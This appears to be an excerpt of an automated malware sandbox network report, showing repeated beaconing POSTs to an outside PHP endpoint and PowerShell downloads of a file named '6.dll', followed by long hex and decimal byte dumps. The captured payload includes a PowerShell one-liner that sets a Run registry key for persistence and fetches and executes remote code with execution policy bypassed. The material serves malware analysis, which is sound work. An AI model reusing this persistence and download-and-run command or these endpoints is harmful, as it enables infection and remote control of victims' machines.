                                                                                                                                                                      Jan 14, 2022 12:21:45.025909901 CET12565INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:44 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:45.026185989 CET12565OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.190582037 CET12565INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.909154892 CET12573INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:45 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:45.909425020 CET12574OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:46.073987961 CET12574INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:46.777786970 CET12575INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:45 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49839 | 207.32.217.137 | 8081 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 12:21:36.970643044 CET | 12548 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:37.140429974 CET | 12548 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:37.779139996 CET | 12550 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:37 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:37.788479090 CET | 12550 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:37.957154989 CET | 12550 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:38.682542086 CET | 12552 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:37 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:38.683393002 CET | 12552 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:38.852834940 CET | 12552 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:39.591142893 CET | 12554 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:38 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:39.592585087 CET | 12554 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:39.761466980 CET | 12554 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:40.521028042 CET | 12556 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:39 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:40.533013105 CET | 12556 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:40.701553106 CET | 12556 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:41.432369947 CET | 12558 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:40 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:41.456486940 CET | 12558 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 286
Expect: 100-continue
Jan 14, 2022 12:21:41.625252962 CET | 12558 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:42.353898048 CET | 12560 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:41 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:42.731497049 CET | 12560 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:42.900404930 CET | 12560 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:43.682684898 CET12562INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:42 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:43.683010101 CET12562OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:43.851597071 CET12562INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:44.575247049 CET12564INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:43 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:44.575479984 CET12564OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:44.743788004 CET12564INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.468019962 CET12566INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:44 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:45.818732023 CET12573OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.986419916 CET12574INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:46.630821943 CET12575INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:45 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49825 | 142.250.186.129 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49824 | 142.250.186.129 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49827 | 104.16.203.237 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49828 | 34.102.176.152 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49829 | 199.91.155.3 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49834 | 142.250.186.129 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49835 | 104.16.202.237 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49836 | 199.91.155.3 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49780 | 104.16.202.237 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:20:22 UTC | 0 | OUT | GET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: www.mediafire.com
Connection: Keep-Alive
2022-01-14 11:20:23 UTC | 0 | IN | HTTP/1.1 302 Found
Date: Fri, 14 Jan 2022 11:20:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4; expires=Tue, 14-Jan-2042 11:20:23 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
Strict-Transport-Security: max-age=0
Access-Control-Allow-Origin: https://www.mediafire.com
Location: https://download2262.mediafire.com/rm83e8erdqxg/nm9ysba5ejf20r8/6.dll
Report-To: {"group": "mediafirenel", "max_age": 86400, "include_subdomains": true, "endpoints": [{"url": "https://browser-reports.mediafire.dev/network-error"}]}
NEL: {"report_to": "mediafirenel", "max_age": 86400, "include_subdomains": true, "failure_fraction": 0.01}
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Set-Cookie: __cf_bm=1Mb3pJ5w.Ot2Fb7eLywKcJ4WJMhVHjwLChg5edttWOo-1642159223-0-AQP9b9maORl8/ZW5a35dAdkgLoEkYJTt+9trfrULg3vZA8hCd4lTd9WdfzAMeXLgq0AqhEvQkZGAdVd1CtsvNQI=; path=/; expires=Fri, 14-Jan-22 11:50:23 GMT; domain=.mediafire.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 6cd679864f6a699f-FRA
2022-01-14 11:20:23 UTC | 1 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49784 | 199.91.155.3 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:20:23 UTC | 1 | OUT | GET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: download2262.mediafire.com
Cookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4
Connection: Keep-Alive
2022-01-14 11:20:24 UTC | 1 | IN | HTTP/1.1 200 OK
server: dsp-0.0.1
content-type: text/plain
accept-ranges: bytes
connection: close
content-encoding: binary
cache-control: no-store
x-robots-tag: noindex, nofollow
content-disposition: attachment; filename="6.dll"
content-length: 490941
date: Fri, 14 Jan 2022 11:20:23 GMT
2022-01-14 11:20:24 UTC | 1 | IN | Data Ascii: start-sleep -s 5New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "NetwrixParam" -Value "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""https://p6tbbb.blogspot.com/atom.xml"" -useB|ie
                                                                                                                                                                      Data Ascii: 26,149,99,222,182,208,4,204,117,16,240,48,39,81,167,225,205,37,188,0,213,220,155,197,84,132,15,78,212,227,107,33,199,185,178,28,22,230,178,171,19,2,202,12,173,166,10,118,208,171,205,111,150,117,14,71,234,35,142,208,147,244,243,245,172,184,249,80,241,163,2
                                                                                                                                                                      2022-01-14 11:20:24 UTC97INData Raw: 34 34 2c 35 35 2c 37 37 2c 32 30 31 2c 31 30 35 2c 35 37 2c 31 35 32 2c 31 36 36 2c 32 32 38 2c 31 38 34 2c 36 35 2c 37 34 2c 31 34 32 2c 31 32 2c 38 32 2c 31 37 38 2c 31 34 32 2c 36 35 2c 37 34 2c 31 35 36 2c 39 35 2c 33 36 2c 32 31 39 2c 34 37 2c 35 33 2c 32 34 2c 31 32 33 2c 32 32 31 2c 39 2c 35 33 2c 38 35 2c 31 31 2c 31 38 32 2c 33 2c 35 31 2c 31 33 31 2c 32 34 37 2c 32 31 39 2c 32 33 38 2c 31 36 38 2c 37 31 2c 31 38 34 2c 32 31 37 2c 32 34 2c 32 30 36 2c 36 32 2c 35 30 2c 31 35 35 2c 36 32 2c 35 34 2c 32 33 37 2c 31 39 31 2c 32 33 39 2c 34 31 2c 32 30 30 2c 37 37 2c 31 31 38 2c 32 30 33 2c 31 30 31 2c 32 33 31 2c 31 30 39 2c 31 35 30 2c 31 34 32 2c 34 2c 35 36 2c 31 38 34 2c 31 32 33 2c 32 30 34 2c 31 31 31 2c 31 38 2c 31 33 39 2c 32 34 31 2c 32 30
                                                                                                                                                                      Data Ascii: 44,55,77,201,105,57,152,166,228,184,65,74,142,12,82,178,142,65,74,156,95,36,219,47,53,24,123,221,9,53,85,11,182,3,51,131,247,219,238,168,71,184,217,24,206,62,50,155,62,54,237,191,239,41,200,77,118,203,101,231,109,150,142,4,56,184,123,204,111,18,139,241,20
                                                                                                                                                                      2022-01-14 11:20:24 UTC113INData Raw: 2c 32 34 32 2c 32 33 31 2c 35 38 2c 31 32 32 2c 31 31 36 2c 38 37 2c 31 38 35 2c 31 30 32 2c 33 34 2c 31 30 33 2c 32 33 36 2c 36 31 2c 39 37 2c 32 38 2c 39 35 2c 31 37 37 2c 32 35 35 2c 32 30 30 2c 31 38 32 2c 32 30 30 2c 32 35 2c 31 31 39 2c 31 35 30 2c 32 33 34 2c 32 34 38 2c 32 32 2c 31 38 33 2c 31 30 39 2c 39 34 2c 32 31 30 2c 31 37 34 2c 32 30 30 2c 32 35 2c 31 30 32 2c 32 33 35 2c 35 36 2c 35 34 2c 31 34 33 2c 32 32 33 2c 31 34 36 2c 31 32 33 2c 34 31 2c 31 31 34 2c 31 39 38 2c 31 39 38 2c 32 33 32 2c 35 36 2c 31 31 38 2c 34 33 2c 31 39 31 2c 31 34 39 2c 31 30 39 2c 31 34 35 2c 35 31 2c 37 38 2c 32 35 2c 31 35 2c 31 37 39 2c 31 32 34 2c 31 36 33 2c 31 30 38 2c 31 33 39 2c 31 35 36 2c 38 31 2c 37 33 2c 32 31 34 2c 31 38 31 2c 32 32 31 2c 32 30 33 2c
                                                                                                                                                                      Data Ascii: ,242,231,58,122,116,87,185,102,34,103,236,61,97,28,95,177,255,200,182,200,25,119,150,234,248,22,183,109,94,210,174,200,25,102,235,56,54,143,223,146,123,41,114,198,198,232,56,118,43,191,149,109,145,51,78,25,15,179,124,163,108,139,156,81,73,214,181,221,203,
                                                                                                                                                                      2022-01-14 11:20:24 UTC129INData Raw: 31 36 37 2c 37 38 2c 32 30 39 2c 31 36 39 2c 31 33 31 2c 34 2c 33 2c 32 33 36 2c 31 37 34 2c 31 39 32 2c 31 37 38 2c 32 37 2c 36 37 2c 32 34 32 2c 31 32 36 2c 31 32 2c 31 31 34 2c 35 33 2c 31 39 31 2c 38 31 2c 31 34 32 2c 32 32 35 2c 37 36 2c 38 36 2c 32 34 34 2c 31 35 37 2c 32 32 34 2c 35 32 2c 32 31 30 2c 32 34 39 2c 36 37 2c 31 36 31 2c 32 30 37 2c 31 39 31 2c 34 38 2c 31 36 37 2c 32 32 36 2c 36 30 2c 31 38 30 2c 31 37 32 2c 38 33 2c 37 39 2c 32 34 2c 32 34 32 2c 31 30 36 2c 34 38 2c 31 30 30 2c 31 37 38 2c 32 33 31 2c 31 39 34 2c 31 38 37 2c 32 33 38 2c 32 32 34 2c 38 34 2c 31 31 37 2c 32 35 30 2c 31 38 36 2c 32 35 34 2c 32 32 30 2c 32 33 33 2c 32 31 38 2c 32 32 39 2c 32 31 32 2c 36 37 2c 31 30 30 2c 31 34 34 2c 31 39 35 2c 31 31 37 2c 32 30 39 2c 31
                                                                                                                                                                      Data Ascii: 167,78,209,169,131,4,3,236,174,192,178,27,67,242,126,12,114,53,191,81,142,225,76,86,244,157,224,52,210,249,67,161,207,191,48,167,226,60,180,172,83,79,24,242,106,48,100,178,231,194,187,238,224,84,117,250,186,254,220,233,218,229,212,67,100,144,195,117,209,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC136INData Raw: 35 2c 31 38 35 2c 31 33 35 2c 31 33 31 2c 31 34 34 2c 34 38 2c 31 31 38 2c 32 33 35 2c 34 39 2c 36 36 2c 37 35 2c 32 30 33 2c 31 32 34 2c 37 31 2c 32 33 33 2c 32 33 39 2c 33 35 2c 31 30 39 2c 31 32 36 2c 32 35 33 2c 31 34 34 2c 39 34 2c 31 32 36 2c 31 31 31 2c 37 35 2c 37 31 2c 31 30 31 2c 31 34 37 2c 33 34 2c 31 39 32 2c 30 2c 31 39 38 2c 33 30 2c 31 35 32 2c 30 2c 32 2c 31 33 30 2c 32 32 34 2c 32 35 2c 31 39 39 2c 31 37 34 2c 31 35 2c 31 36 38 2c 39 32 2c 38 31 2c 39 38 2c 31 32 36 2c 31 33 33 2c 31 38 38 2c 30 2c 32 30 30 2c 32 33 38 2c 38 39 2c 31 31 2c 32 35 31 2c 31 32 2c 31 35 39 2c 34 33 2c 39 34 2c 31 35 35 2c 32 33 31 2c 31 37 39 2c 32 31 36 2c 31 33 32 2c 38 32 2c 32 31 31 2c 31 37 2c 31 33 30 2c 34 37 2c 32 32 2c 31 33 31 2c 39 33 2c 31 32 2c
                                                                                                                                                                      Data Ascii: 5,185,135,131,144,48,118,235,49,66,75,203,124,71,233,239,35,109,126,253,144,94,126,111,75,71,101,147,34,192,0,198,30,152,0,2,130,224,25,199,174,15,168,92,81,98,126,133,188,0,200,238,89,11,251,12,159,43,94,155,231,179,216,132,82,211,17,130,47,22,131,93,12,
                                                                                                                                                                      2022-01-14 11:20:24 UTC152INData Raw: 36 2c 37 39 2c 31 31 34 2c 39 32 2c 32 32 38 2c 31 34 30 2c 31 37 34 2c 32 35 30 2c 31 35 32 2c 34 30 2c 32 34 38 2c 33 30 2c 31 30 32 2c 31 37 36 2c 31 31 33 2c 31 35 30 2c 31 34 35 2c 31 32 2c 36 2c 32 32 36 2c 36 37 2c 32 35 31 2c 31 35 31 2c 35 32 2c 32 34 39 2c 32 34 31 2c 39 2c 39 36 2c 31 31 34 2c 37 38 2c 32 33 32 2c 31 37 34 2c 31 32 34 2c 37 39 2c 31 37 2c 35 34 2c 32 30 36 2c 32 34 36 2c 32 30 33 2c 31 36 38 2c 32 31 37 2c 31 33 30 2c 32 32 38 2c 35 33 2c 31 35 30 2c 32 34 34 2c 31 31 37 2c 31 34 36 2c 31 32 30 2c 31 37 37 2c 31 37 39 2c 32 34 34 2c 31 32 2c 36 33 2c 31 30 32 2c 39 35 2c 36 38 2c 31 39 30 2c 32 2c 32 32 37 2c 31 32 39 2c 32 31 30 2c 31 35 38 2c 32 34 36 2c 31 31 2c 32 33 32 2c 36 32 2c 35 37 2c 37 37 2c 31 30 34 2c 31 33 2c 31
                                                                                                                                                                      Data Ascii: 6,79,114,92,228,140,174,250,152,40,248,30,102,176,113,150,145,12,6,226,67,251,151,52,249,241,9,96,114,78,232,174,124,79,17,54,206,246,203,168,217,130,228,53,150,244,117,146,120,177,179,244,12,63,102,95,68,190,2,227,129,210,158,246,11,232,62,57,77,104,13,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC168INData Raw: 2c 39 39 2c 32 30 32 2c 38 33 2c 39 34 2c 31 34 36 2c 31 38 30 2c 32 32 2c 31 31 34 2c 31 39 38 2c 31 39 39 2c 31 32 35 2c 31 31 37 2c 31 38 36 2c 35 35 2c 32 30 30 2c 37 32 2c 31 36 2c 32 31 35 2c 39 31 2c 31 34 39 2c 31 38 30 2c 31 35 30 2c 31 32 2c 39 35 2c 32 30 34 2c 31 30 35 2c 31 37 33 2c 31 37 31 2c 31 33 37 2c 36 37 2c 32 35 31 2c 35 31 2c 36 33 2c 33 30 2c 32 30 38 2c 32 30 33 2c 36 35 2c 38 30 2c 35 34 2c 31 37 33 2c 31 34 30 2c 31 33 33 2c 35 38 2c 31 32 30 2c 31 30 35 2c 33 31 2c 31 33 37 2c 37 32 2c 35 36 2c 31 31 37 2c 31 36 33 2c 31 35 31 2c 39 35 2c 31 38 32 2c 35 35 2c 31 33 38 2c 37 30 2c 33 32 2c 39 36 2c 39 30 2c 31 38 37 2c 37 35 2c 31 33 31 2c 32 32 31 2c 31 36 35 2c 34 2c 32 35 2c 32 31 36 2c 31 31 33 2c 38 32 2c 31 33 34 2c 39 36
                                                                                                                                                                      Data Ascii: ,99,202,83,94,146,180,22,114,198,199,125,117,186,55,200,72,16,215,91,149,180,150,12,95,204,105,173,171,137,67,251,51,63,30,208,203,65,80,54,173,140,133,58,120,105,31,137,72,56,117,163,151,95,182,55,138,70,32,96,90,187,75,131,221,165,4,25,216,113,82,134,96
                                                                                                                                                                      2022-01-14 11:20:24 UTC184INData Raw: 31 31 38 2c 32 30 34 2c 32 35 33 2c 36 2c 31 31 34 2c 32 33 33 2c 32 35 32 2c 31 33 37 2c 32 31 30 2c 32 36 2c 32 34 38 2c 32 37 2c 31 30 30 2c 37 33 2c 36 34 2c 31 39 39 2c 31 39 39 2c 31 30 34 2c 32 32 32 2c 31 37 37 2c 38 30 2c 32 32 38 2c 32 34 38 2c 32 33 39 2c 34 33 2c 32 33 31 2c 31 37 36 2c 32 34 37 2c 31 39 37 2c 39 34 2c 38 37 2c 32 31 30 2c 31 38 33 2c 32 39 2c 37 38 2c 34 30 2c 31 37 35 2c 32 35 32 2c 38 31 2c 32 30 31 2c 31 36 31 2c 31 31 31 2c 31 37 36 2c 37 2c 31 33 31 2c 31 37 33 2c 35 31 2c 32 32 36 2c 32 30 31 2c 32 31 37 2c 37 31 2c 31 34 34 2c 31 38 39 2c 31 38 2c 31 36 39 2c 32 30 32 2c 32 32 30 2c 36 39 2c 31 32 30 2c 37 30 2c 31 30 34 2c 31 2c 31 31 34 2c 36 37 2c 37 35 2c 31 34 35 2c 39 37 2c 31 34 38 2c 32 32 32 2c 31 37 36 2c 31
                                                                                                                                                                      Data Ascii: 118,204,253,6,114,233,252,137,210,26,248,27,100,73,64,199,199,104,222,177,80,228,248,239,43,231,176,247,197,94,87,210,183,29,78,40,175,252,81,201,161,111,176,7,131,173,51,226,201,217,71,144,189,18,169,202,220,69,120,70,104,1,114,67,75,145,97,148,222,176,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC200INData Raw: 2c 37 30 2c 32 31 36 2c 37 39 2c 38 37 2c 31 34 34 2c 33 37 2c 32 33 31 2c 35 30 2c 35 30 2c 31 33 36 2c 39 32 2c 32 33 30 2c 32 31 39 2c 31 30 35 2c 37 38 2c 38 32 2c 39 30 2c 31 30 33 2c 31 31 32 2c 32 37 2c 38 36 2c 39 35 2c 32 35 34 2c 31 31 39 2c 36 30 2c 31 35 31 2c 32 35 35 2c 32 39 2c 31 31 31 2c 32 31 38 2c 32 30 39 2c 31 37 30 2c 38 31 2c 31 33 35 2c 31 37 37 2c 31 35 2c 32 32 38 2c 31 34 33 2c 31 34 39 2c 31 34 34 2c 32 34 39 2c 31 31 36 2c 32 34 37 2c 32 32 35 2c 31 39 37 2c 31 33 38 2c 30 2c 32 31 38 2c 31 30 30 2c 33 31 2c 32 39 2c 32 31 36 2c 31 37 36 2c 39 31 2c 31 32 39 2c 37 37 2c 31 32 30 2c 35 31 2c 32 31 37 2c 36 37 2c 32 34 35 2c 38 32 2c 32 30 32 2c 32 34 37 2c 32 32 33 2c 32 32 32 2c 31 36 36 2c 31 35 37 2c 32 32 2c 32 33 36 2c 37
                                                                                                                                                                      Data Ascii: ,70,216,79,87,144,37,231,50,50,136,92,230,219,105,78,82,90,103,112,27,86,95,254,119,60,151,255,29,111,218,209,170,81,135,177,15,228,143,149,144,249,116,247,225,197,138,0,218,100,31,29,216,176,91,129,77,120,51,217,67,245,82,202,247,223,222,166,157,22,236,7
